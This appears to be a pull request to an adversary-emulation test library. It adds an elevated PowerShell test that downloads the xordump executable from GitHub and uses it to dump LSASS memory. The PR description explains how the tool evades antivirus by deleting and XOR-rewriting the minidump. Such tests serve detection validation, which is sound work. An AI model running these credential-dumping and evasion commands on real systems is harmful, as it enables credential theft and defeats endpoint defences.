### PR TITLE
adds additional lsass dump test

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
       del C:\windows\temp\dumpert.dmp >nul 2> nul
     name: command_prompt
     elevation_required: true
+
 - name: Dump LSASS.exe Memory using Windows Task Manager
   auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
   description: |
@@ -158,6 +159,7 @@ atomic_tests:
       3. Dump lsass.exe memory:
         Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
     name: manual
+
 - name: Offline Credential Theft With Mimikatz
   auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
   description: |
@@ -354,3 +356,36 @@ atomic_tests:
       del #{output_file}
     name: powershell
     elevation_required: true  
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+    importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+    file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+    Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+  supported_platforms:
+  - windows
+  input_arguments:
+    xordump_exe:
+      description: Path to xordump
+      type: Path
+      default: C:\Windows\Temp\xordump.exe
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+  dependencies:
+  - description: |
+      Computer must have xordump.exe
+    prereq_command: |
+      if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+  executor:
+    command: |
+      #{xordump_exe} -out #{output_file} -x 0x41
+    cleanup_command: |
+      Remove-Item ${output_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: true


### PR DESCRIPTION
**Details:**
In some cases, lsass.exe minidump files are signatured by AV and deleted. It's not unusual for the binary that initiated the lsass dump to be left on disk and not treated as malicious.

The dll loaded into this bin for minidumping (dgbhelp) writes the minidump to disk, but before this binary closes the file handle to the minidump, it re-reads the contents into memory. It then closes the file handle and immediately deletes the minidump.

There may exist a race between the binary deleting the minidump file after a `close(handle)` and with AV detecting and deleting the minidump. In either case, the output is safe in memory and passed to a xor function which then re-writes the xor'd data to disk, where it can be safely copied off.


**Testing:**
This tests for both the use of imported debugging DLLs and for brittle detections that rely on signatured lsass minidumps.

**Associated Issues:**
N/A